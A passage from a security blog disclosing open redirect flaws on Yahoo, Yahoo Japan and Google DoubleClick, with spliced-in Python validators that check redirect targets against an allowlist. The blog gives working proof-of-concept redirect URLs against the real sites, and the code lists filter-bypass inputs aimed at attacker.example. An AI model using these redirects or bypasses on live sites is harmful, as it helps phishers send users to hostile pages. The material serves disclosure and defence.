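# Assumption: hosts the site is willing to redirect to (constructed names).
ALLOWED_HOSTS = {"sports.example", "portal.example"}


def extract_targets(link):
    """Return every redirect target a link carries.

    Covers the two shapes shown on this page: a percent-encoded target in a
    query parameter, and a raw target appended to the path after '/*'.
    """
    parts = urlsplit(link)
    targets = [value
               for key, value in parse_qsl(parts.query, keep_blank_values=True)
               if key.lower() in REDIRECT_PARAMS]
    if "/*" in parts.path:
        targets.append(link[link.index("/*") + 2:])
    return targets


def is_allowed_host(host, allowed_hosts=ALLOWED_HOSTS):
    """Exact match or true subdomain of an allowed host (no suffix tricks)."""
    host = (host or "").lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in allowed_hosts)


def is_safe_target(target, allowed_hosts=ALLOWED_HOSTS):
    """True only for same-site absolute paths or http(s) URLs on an allowed host."""
    # Browsers treat '\' like '/', so normalise before parsing.
    candidate = target.strip().replace("\\", "/")
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in candidate):
        return False
    try:
        parts = urlsplit(candidate)
        host = parts.hostname
    except ValueError:
        return False
    if not parts.scheme and not parts.netloc:
        # Relative reference: accept '/path' but not '//host' or '///host',
        # which browsers resolve to another host.
        return candidate.startswith("/") and not candidate.startswith("//")
    if parts.scheme not in ("", "http", "https"):
        return False
    # hostname ignores any 'user@' prefix and port, so 'trusted@other' fails.
    return is_allowed_host(host, allowed_hosts)


def audit(links, allowed_hosts=ALLOWED_HOSTS):
    """Return (link, target) pairs whose target would leave the allowed hosts."""
    return [(link, target)
            for link in links
            for target in extract_targets(link)
            if not is_safe_target(target, allowed_hosts)]


# Constructed sample links modelled on the parameter names used on this page.
SAMPLE_LINKS = [
    "https://r.sports.example/members/login?appRedirect=https%3A%2F%2Fwww.sports.example%2Fscores",
    "https://r.sports.example/members/login?appRedirect=http%3A%2f%2funtrusted.test",
    "http://streak.sports.example/en/login?redirect=https%3A%2F%2Fsports.example.untrusted.test%2F",
    "http://m.sports.example/wireless/mw/util/redirectKeepParams?w=1dpoa&url=%2F%2Funtrusted.test%2Fx",
    "http://p2.ard.portal.example/SIG=abc/R=8/*http://help.portal.example/help/index.html",
    "http://p3.ard.portal.example/SIG=abc/R=8/*http://untrusted.test",
    "http://m.sports.example/wireless/mw/util/redirectKeepParams?url=%2Fscores",
]

if __name__ == "__main__":
    for link, target in audit(SAMPLE_LINKS):
        print("off-site redirect:", target, "<-", link)
```

The same `is_safe_target` check can sit in the redirect handler itself, falling back to a fixed landing page when it returns False.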
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"><br /></span>
</span><br />
<div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"><br /></span>
</span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">BugTraq is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security vulnerabilities: what they are, how to exploit them, and how to fix them. The following may be posted to the Bugtraq list: (a) Information on computer or network related security vulnerabilities (UNIX, Windows NT, or any other). (b) Exploit programs, scripts or detailed processes about the above. (c) Patches, workarounds, fixes. (d) Announcements, advisories or warnings. (e) Ideas, future plans or current works dealing with computer/network security. (f) Information material regarding vendor contacts and procedures. (g) Individual experiences in dealing with above vendors or security organizations. (h) Incident advisories or informational reporting. (i) New or updated security tools. A large number of advisories in the following web security categories have been published there: Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards. It also publishes suggestions, advisories and solution details related to Open Redirect vulnerabilities, as well as cyber intelligence recommendations.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
</span></div>
</div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">(1) Yahoo.com Open Redirect</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;"><br /></b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><b><br /></b>
<b>Domain:</b></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">yahoo.com</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
"Yahoo Inc. (styled as Yahoo!) is an American multinational technology company headquartered in Sunnyvale, California. It is globally known for its Web portal, search engine Yahoo Search, and related services, including Yahoo Directory, Yahoo Mail, Yahoo News, Yahoo Finance, Yahoo Groups, Yahoo Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo websites every month. Yahoo itself claims it attracts more than half a billion consumers every month in more than 30 languages. Yahoo was founded by Jerry Yang and David Filo in January 1994 and was incorporated on March 1, 1995. Marissa Mayer, a former Google executive, serves as CEO and President of the company." (Wikipedia)</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">Vulnerable URLs:</b></span></div>
<div>
<a href="http://p2.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://help.yahoo.com/help/us/local/index.html" target="_blank"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://p2.ard.sp1.yahoo.com/<wbr></wbr>SIG=153ldvf0k/M=289534.<wbr></wbr>11126839.11694361.10790529/D=<wbr></wbr>local/S=2022555687:FOOT3/Y=<wbr></wbr>YAHOO/EXP=1237445081/L=<wbr></wbr>ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0<wbr></wbr>nBzbYACrCK/B=ygUAANiRN9w-/J=<wbr></wbr>1237437881452401/A=4763404/R=<wbr></wbr>8/*http://help.yahoo.com/help/<wbr></wbr>us/local/index.html</span></a></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="http://p3.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com" target="_blank"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://p3.ard.sp1.yahoo.com/<wbr></wbr>SIG=153ldvf0k/M=289534.<wbr></wbr>11126839.11694361.10790529/D=<wbr></wbr>local/S=2022555687:FOOT3/Y=<wbr></wbr>YAHOO/EXP=1237445081/L=<wbr></wbr>ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0<wbr></wbr>nBzbYACrCK/B=ygUAANiRN9w-/J=<wbr></wbr>1237437881452401/A=4763404/R=<wbr></wbr>8/*http://www.google.com</span></a></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="http://p4.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com" target="_blank"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://p4.ard.sp1.yahoo.com/<wbr></wbr>SIG=153ldvf0k/M=289534.<wbr></wbr>11126839.11694361.10790529/D=<wbr></wbr>local/S=2022555687:FOOT3/Y=<wbr></wbr>YAHOO/EXP=1237445081/L=<wbr></wbr>ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0<wbr></wbr>nBzbYACrCK/B=ygUAANiRN9w-/J=<wbr></wbr>1237437881452401/A=4763404/R=<wbr></wbr>8/*http://www.google.com</span></a></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">Poc Video:</b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=k4eFLsTyZkg" style="background-color: white;">https://www.youtube.com/watch?v=k4eFLsTyZkg</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /><b>Another Yahoo Open Redirect Vulnerability Video Published Before:</b></span></div>
<div>
<a href="https://www.youtube.com/watch?v=GTd1Gkj6OUY" target="_blank"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?<wbr></wbr>v=GTd1Gkj6OUY</span></a></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">Blog:</b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-open-redirect-security.html" style="background-color: white;">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-open-redirect-security.html</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2014/10/yahoo-open-redirect-vulnerability.html" style="background-color: white;">http://securityrelated.blogspot.com/2014/10/yahoo-open-redirect-vulnerability.html</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">(2) <a href="http://yahoo.co.jp/" target="_blank">Yahoo.co.jp</a> Open Redirect</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
<br />
<b>Domain:</b></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">yahoo.co.jp</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"Yahoo! JAPAN Corporation (ヤフージャパン株式会社 Yafū Japan Kabushiki-gaisha?) is a Japanese internet company formed as a joint venture between the American internet company Yahoo! and the Japanese internet company SoftBank. It is headquartered at Midtown Tower in the Tokyo Midtown complex in Akasaka, Minato, Tokyo. Yahoo! Japan was listed on JASDAQ in November 1997. In January 2000, it became the first stock in Japanese history to trade for more than ¥100 million per share. The company was listed on the Tokyo Stock Exchange in October 2003 and became part of the Nikkei 225 stock market index in 2005. Yahoo! Japan acquired the naming rights for the Fukuoka Dome in 2005, renaming the dome as the "Fukuoka Yahoo! Japan Dome". The "Yahoo Dome" is the home field for the Fukuoka SoftBank Hawks, a professional baseball team majority owned by SoftBank." (Wikipedia)</span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">The following tests use one webpage, whose address is "<a href="http://itinfotech.tumblr.com/">http://itinfotech.tumblr.com/</a>". Suppose that this webpage is malicious.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br />
</span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">Vulnerable URL:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030344&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http%3A%2F%2Fshopping.yahoo.co.jp" style="background-color: white;" target="_blank">http://order.store.yahoo.co.<wbr></wbr>jp/cgi-bin/yj-affiliate-entry?<wbr></wbr>ITRACK_INFO=<wbr></wbr>087836355102152107140219030344<wbr></wbr>&COOKIE_PATH=/&COOKIE_DOMAIN=.<wbr></wbr>yahoo.co.jp&VIEW_URL=http%3A%<wbr></wbr>2F%2Fshopping.yahoo.co.jp</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">POC:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030330&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http://www.inzeed.com/kaleidoscope" style="background-color: white;" target="_blank">http://order.store.yahoo.co.<wbr></wbr>jp/cgi-bin/yj-affiliate-entry?<wbr></wbr>ITRACK_INFO=<wbr></wbr>087836355102152107140219030330<wbr></wbr>&COOKIE_PATH=/&COOKIE_DOMAIN=.<wbr></wbr>yahoo.co.jp&VIEW_URL=http://<wbr></wbr>www.inzeed.com/kaleidoscope</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: white;">PoC Video:</b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=2SM78WKAVr8&feature=youtu.be" style="background-color: white;">https://www.youtube.com/watch?v=2SM78WKAVr8&feature=youtu.be</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /><b>Blog:</b></span><br />
<a href="http://securityrelated.blogspot.com/2014/12/yahoo-yahoocojp-open-redirect-security.html"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocojp-open-redirect-security.html</span></a></div>
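<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">One way to validate the VIEW_URL parameter shown above before redirecting, next to a weak substring check that the same inputs pass. This is an added example, not code from the original post or from Yahoo: the allowlist, the fallback URL, the function names and the attacker.example inputs are assumptions, and only the two request URLs are taken from this post.</span></div>

```python
"""Allowlist validation for a redirect parameter such as VIEW_URL (added example)."""
from urllib.parse import urlsplit, parse_qs

# Assumption: the only host this endpoint should ever send users to.
ALLOWED_HOSTS = {"shopping.yahoo.co.jp"}
ALLOWED_PORTS = {None, 80, 443}
FALLBACK = "http://shopping.yahoo.co.jp/"  # assumed safe default landing page

# The two request URLs quoted in the post (legitimate use, then the PoC).
LEGIT = ("http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry"
         "?ITRACK_INFO=087836355102152107140219030344&COOKIE_PATH=/"
         "&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http%3A%2F%2Fshopping.yahoo.co.jp")
POC = ("http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry"
       "?ITRACK_INFO=087836355102152107140219030330&COOKIE_PATH=/"
       "&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http://www.inzeed.com/kaleidoscope")

# Constructed inputs a validator must reject; each one contains the trusted name.
MUST_REJECT = [
    "http://shopping.yahoo.co.jp@attacker.example/",    # trusted name as userinfo
    "http://shopping.yahoo.co.jp.attacker.example/",    # trusted name as a prefix
    "//attacker.example/yahoo.co.jp",                   # scheme-relative target
    "http://attacker.example/?ref=yahoo.co.jp",         # trusted name in the query
    "http://attacker.example\\@shopping.yahoo.co.jp/",  # backslash parsing confusion
]


def naive_filter(target):
    """Hypothetical weak check: substring match on the trusted domain."""
    return "yahoo.co.jp" in target


def is_safe_redirect(target):
    """Return True only for an absolute http(s) URL whose host is allowlisted."""
    if not target or target != target.strip():
        return False
    # Control characters and backslashes are normalised differently by
    # browsers and server-side parsers, so refuse them outright.
    if any(ord(c) < 0x20 or c in "\\\x7f" for c in target):
        return False
    try:
        parts = urlsplit(target)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False  # also rejects scheme-relative "//host/..." targets
    if parts.username is not None or parts.password is not None:
        return False  # "trusted@other-host" puts the real host after the "@"
    host = (parts.hostname or "").rstrip(".").lower()
    # Exact host comparison: no substring, prefix or suffix matching.
    return host in ALLOWED_HOSTS and port in ALLOWED_PORTS


def resolve_view_url(request_url):
    """Return the redirect destination for a request, or FALLBACK if unsafe."""
    values = parse_qs(urlsplit(request_url).query).get("VIEW_URL", [])
    if len(values) != 1:  # missing or duplicated parameter
        return FALLBACK
    return values[0] if is_safe_redirect(values[0]) else FALLBACK


if __name__ == "__main__":
    print("legit ->", resolve_view_url(LEGIT))
    print("poc   ->", resolve_view_url(POC))
    for url in MUST_REJECT:
        print(f"{url!r}: naive={naive_filter(url)} strict={is_safe_redirect(url)}")
```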
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-67838918531892325112015-06-05T01:31:00.000-07:002015-06-05T01:34:16.466-07:00Google DoubleClick Website System Could be Used by Spammers<div class="">
<div class="im">
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-2q3R4IoKM74/VXFLjTkuW-I/AAAAAAAAA-g/fs8UaCoJ7KM/s1600/google_double_click.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://4.bp.blogspot.com/-2q3R4IoKM74/VXFLjTkuW-I/AAAAAAAAA-g/fs8UaCoJ7KM/s400/google_double_click.png" width="400" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">Google DoubleClick.net (Advertising) System URL Redirection Vulnerabilities Could Be Used by Spammers</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><br /></span></span>
<br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Although Google does not include Open Redirect vulnerabilities in its bug bounty program, its preventive measures against Open Redirect attacks have been quite thorough and effective to date.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"></span></span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"></span></span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">However, Google might have overlooked the security of its DoubleClick.net <wbr></wbr>advertising system. After some tests, it was found that most of the redirection URLs within DoubleClick.net are vulnerable to Open Redirect attacks. Many redirections are likely to be affected. </span>This could allow an attacker to create a specially crafted URL that, if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks work because the crafted URL initially appears to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client-side software such as a web browser or document rendering programs.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"></span></span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"></span><br />
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">These redirections can be easily used by spammers, too.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">Some URLs belonging to Googleads.g.Doubleclick.net</span><wbr></wbr><span style="font-size: small;"> are vulnerable to Open Redirect attacks, too, although Google prevents similar URL redirections outside Googleads.g.Doubleclick.<wbr></wbr>net. Attackers can use URLs related to Google Account to make the attacks more powerful.</span></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Moreover, these vulnerabilities can be used to attack other companies such as Google, eBay, The New York Times, Amazon, Godaddy, Yahoo and Netease, e.g. by bypassing their Open Redirect filters (Covert Redirect). These security bugs have not been patched. Other similar web and computer attacks will be published in the near future.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
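<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">A triage helper for the chained case described above, where every hop looks trusted but the last destination is off-site. This is an added example, not code from the original post or from Google: it unwraps URL-valued query parameters recursively and reports chains that start on a trusted domain and end elsewhere. The trusted-domain list, the function names and all .example URLs are constructed assumptions.</span></div>

```python
"""Unwrap nested redirect parameters and flag off-site final hops (added example)."""
from urllib.parse import urlsplit, parse_qsl, quote

MAX_DEPTH = 5  # bound on nesting, so hostile input cannot force deep recursion

# Assumption: domains the organisation (or its mail filter) treats as trusted.
TRUSTED = {"site-a.example", "partner-b.example"}

# Constructed samples. COVERT nests a second redirector inside the first;
# each layer is percent-encoded once more than the layer around it.
INNER = "https://ads.partner-b.example/clk?url=" + quote("http://attacker.example/", safe="")
COVERT = "https://login.site-a.example/continue?next=" + quote(INNER, safe="")
BENIGN = "https://login.site-a.example/continue?next=" + quote(
    "https://www.site-a.example/account", safe="")
RELATIVE = "https://ads.partner-b.example/clk?url=//attacker.example/landing"
PLAIN = "https://www.site-a.example/news?id=42"


def _host(url):
    """Lower-cased host of an absolute http(s) URL, or None."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme.lower() not in ("http", "https") or not parts.hostname:
        return None
    return parts.hostname.rstrip(".").lower()


def redirect_chains(url, _depth=0):
    """Return every chain of hosts reachable through URL-valued parameters."""
    host = _host(url)
    if host is None:
        return []
    chains = []
    if _depth < MAX_DEPTH:
        # parse_qsl decodes one layer of percent-encoding per level.
        for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
            if value.startswith("//"):
                value = "http:" + value  # browsers resolve scheme-relative targets
            if "://" not in value:
                continue
            for tail in redirect_chains(value, _depth + 1):
                chains.append([host] + tail)
    return chains or [[host]]


def is_trusted(host, trusted=TRUSTED):
    """True for a trusted domain itself or any of its subdomains."""
    return any(host == d or host.endswith("." + d) for d in trusted)


def triage(url, trusted=TRUSTED):
    """Chains that begin on a trusted host but end on an untrusted one."""
    return [chain for chain in redirect_chains(url)
            if len(chain) > 1
            and is_trusted(chain[0], trusted)
            and not is_trusted(chain[-1], trusted)]


if __name__ == "__main__":
    for sample in (COVERT, BENIGN, RELATIVE, PLAIN):
        hits = triage(sample)
        verdict = " -> ".join(hits[0]) if hits else "ok"
        print(f"{verdict:60} {sample}")
```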
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<div style="line-height: 20.7900009155273px;">
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Discoverer and Reporter:</span></div>
</div>
<div>
<div style="padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><span style="line-height: 17.8181819915772px; text-align: justify;">Jing Wang, </span><span style="line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/534330655891419136">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span></span><a href="http://www.tetraph.com/wangjing/" style="line-height: 28px; text-align: justify;">http://www.tetraph.com/<wbr></wbr>wangjing/</a></span></div>
</div>
<div style="line-height: 20.7900009155273px;">
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1) Background Related to Google DoubleClick.net.</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.1) What is DoubleClick.net?</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">"</span><span style="font-family: Arial, Helvetica, sans-serif;">DoubleClick is a subsidiary of Google which develops and provides Internet ad serving services. Its clients include agencies, marketers (Universal McCann, AKQA etc.) and publishers who serve customers like Microsoft, General Motors, Coca-Cola, Motorola, L'Oréal, Palm, Inc., Apple Inc., Visa USA, Nike, Carlsberg among others. DoubleClick's headquarters is in New York City, United States.</span></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">DoubleClick was founded in 1996 by Kevin O'Connor and Dwight Merriman. It was formerly listed as "DCLK" on the NASDAQ, and was purchased by private equity firms Hellman & Friedman and JMI Equity in July 2005. In March 2008, Google acquired DoubleClick for US$3.1 billion. Unlike many other dot-com companies, it survived the dot-com bubble and focuses on uploading ads and reporting their performance.</span><span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">" (Wikipedia)</span></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2) Reports Related to Google DoubleClick.net Used by Spammers</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2.1)</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Google DoubleClick.net has been used by spammers for a long time. The following is a report from 2008.</span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"The open redirect had become popular with spammers trying to lure users into clicking their links, as they could be made to look like safe URLs within Google's domain."</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.virusbtn.com/blog/2008/06_03a.xml?comments" style="background-color: white;" target="_blank">https://www.virusbtn.com/blog/<wbr></wbr>2008/06_03a.xml?comments</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
